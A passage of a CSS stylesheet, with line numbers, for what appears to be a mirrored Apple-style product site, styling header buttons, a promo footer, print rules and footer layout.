.howtobuys { background-image: url(../howtobuys.html); _background-image: url(../howtobuys-2.html); width: 86px; }
481
.joinnows { background-image: url(joinnows.png); _background-image: url(joinnows.gif); width: 72px; }
482
.learnmores { background-image: url(../learnmores.html); _background-image: url(../learnmores-2.html); width: 89px; }
483
.nikebuynows { background-image: url(../nikebuynows.html); _background-image: url(../nikebuynows-2.html); width: 72px; }
484
.notifymes { background-image: url(../notifymes.html); _background-image: url(../notifymes-2.html); width: 80px; }
485
.ordernows { background-image: url(ordernows.png); _background-image: url(ordernows.gif); width: 81px; }
486
.preordernows { background-image: url(preordernows.png); _background-image: url(preordernows.gif); width: 99px; }
487
.preorders { background-image: url(../preorders.html); _background-image: url(../preorders-2.html); width: 77px; }
488
.reserves { background-image: url(../reserves.html); _background-image: url(../reserves-2.html); width: 68px; }
489
.startyoursearchs { background-image: url(../startyoursearchs.html); _background-image: url(../startyoursearchs-2.html); width: 120px; }
490
.submits { background-image: url(../submits.html); _background-image: url(../submits-2.html); width: 67px; }
491
.tryamacs { background-image: url(../tryamacs.html); _background-image: url(../tryamacs-2.html); width: 77px; }
492
.upgradenows { background-image: url(upgradenows.png); _background-image: url(upgradenows.gif); width: 104px; }
493
494
#productheader .browsewebappss, #productheader .businessstores, #productheader .buyiphones, #productheader .buynows, #productheader .comingsoons, #productheader .descargarahoras,
495
#productheader .downloadituness, #productheader .downloadnows, #productheader .finds, #productheader .freetrials, #productheader .getstarteds,
496
#productheader .gos, #productheader .howtoapplys, #productheader .howtobuys, #productheader .joinnows, #productheader .learnmores,
497
#productheader .notifymes, #productheader .ordernows, #productheader .preordernows, #productheader .preorders, #productheader .reserves,
498
#productheader .startyoursearchs, #productheader .submits, #productheader .tryamacs, #productheader .upgradenows {
499
margin: 0.8em 0 0 20px; float: left;
500
}
501
502
/* promofooter */
503
#promofooter { width:984px; margin:18px auto 0; padding-top:17px; background:url(../promofooter_top.html) no-repeat; zoom:1; _background-image:url(../promofooter_top-2.html); }
504
#promofooter #promos { width:980px; margin-bottom:0; padding:0 2px 4px; background:url(../promofooter_bottom.html) no-repeat 0 100%; zoom:1; _background-image:url(../promofooter_bottom-2.html); }
505
#promofooter #promos:after { content:'.'; display:block; height:0; clear:both; visibility:hidden; }
506
#promofooter #promos li.promo { position:relative; float:left; width:244px; min-height:15em; _height:15em; padding-right:1px; margin-top:-16px; }
507
#promofooter #promos li.promo a { color:#777; }
508
#promofooter #promos li.promo:hover a { color:#08c; text-decoration:none; }
509
510
#promofooter #promos img { display:block; }
511
512
#promofooter #promos h4 a,
513
#promofooter #promos p a,
514
#promofooter #promos ul { display:block; padding-left:15px; padding-right:12px; text-align:left; z-index:101; *position:relative; }
515
516
#promofooter #promos h4 a { font-size:18px; font-weight:normal; padding-top:15px; }
517
#promofooter #promos p { margin-bottom:0; }
518
#promofooter #promos p a { font-size:11px; line-height:16px; }
519
#promofooter #promos a.image { height:180px; position:absolute; bottom:0; z-index:100; }
520
521
#promofooter #promos .promo.left p a { width:110px; }
522
#promofooter #promos .promo.right p a { width:112px; padding-left:116px; }
523
#promofooter #promos .promo.center p a { text-align:center; }
524
525
#promofooter #promos li.buy { position:relative; float:left; width:244px; padding-right:1px; margin-top:-17px; color:#777; }
526
#promofooter #promos li.buy ul { font-size:11px; line-height:1.4; }
527
528
#promofooter.grid2col { min-height: 70px; padding:15px 0 8px 0; border: 1px solid #D2D2D2; }
529
#promofooter.grid2col { background:#fff;
530
background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#fff), to(#e5e5e5));
531
background:-moz-linear-gradient(100% 100% 90deg, #e5e5e5, #fff);
532
filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0, startColorstr='#FFFFFF', endColorstr='#e5e5e5');
533
}
534
#promofooter.grid2col #promos { background: none;}
535
#promofooter.grid2col #promos li.promo { width: 47%; min-height: 70px; margin-bottom: -10px; }
536
#promofooter.grid2col #promos li.promo.first { border-right: 1px solid #e8e8e8; }
537
#promofooter.grid2col li.promo { padding:20px; }
538
539
/* PRINT */
540
@media print {
541
body, #main, #content { color: #000 !important; }
542
a, a:link, a:visited { color: #000 !important; text-decoration:none !important; }
543
#tabs, #globalheader, #globalfooter, #directorynav, .noprint, .hide { display: none !important; }
544
#main a.pdf, #main a.html, #main a.qt, #main a.ical, #main a.dl, #main a.dmg, #main a.zip, #main a.keynote, #main a.audio { padding-left: 0 !important; background-image: none !important; }
545
}
546
547
/* iPhone */
548
@media screen and (max-device-width: 480px) { html { -webkit-text-size-adjust: none; } }
549
550
/*New locales changes*/
551
#globalfooter p.gf-iphonefootnote { float: left; width: 100%; margin:18px 0 -7px 3px; padding-bottom:9px; border-bottom:1px solid #DDDDDD; }
552
#globalfooter .gf-links { float: right; margin: 18px 3px 9px 0; }
553
#globalfooter p.gf-copyright { float: left; width: 30%; margin: 18px 0 9px 3px; }
554
html[lang=el_GR] #globalfooter p.gf-copyright { float: left; width: 20%; margin: 18px 0 9px 3px; }
555
#globalfooter ul.piped a.privacy { padding-right: 1.5em; border-right: 1px solid #d0d0d0; }
556
#globalfooter p.gf-iphonefootnote-top { float: left; width: 100%; margin: 18px 0 -7px 3px; padding-bottom:9px;}
557
#globalfooter p.gf-iphonefootnote-bottom { float: left; width: 100%; margin: 8px 0 -7px 3px; padding-bottom:9px; border-bottom:1px solid #DDDDDD;}
558
559